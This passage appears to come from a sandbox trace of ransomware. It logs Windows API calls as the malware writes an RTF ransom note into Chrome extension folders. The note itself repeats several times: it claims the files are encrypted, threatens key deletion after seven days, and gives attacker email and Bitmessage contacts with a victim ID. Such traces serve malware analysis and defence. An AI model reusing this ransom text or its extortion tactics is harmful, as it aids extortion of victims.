data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0289.249] WriteFile (in: hFile=0x2d4, lpBuffer=0x2462808*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2462808*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.250] CloseHandle (hObject=0x2d4) returned 1 [0289.250] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\#readme_eman#.rtf")) returned 0xffffffff [0289.250] GetLastError () returned 0x2 [0289.250] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0289.253] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.253] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.253] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a 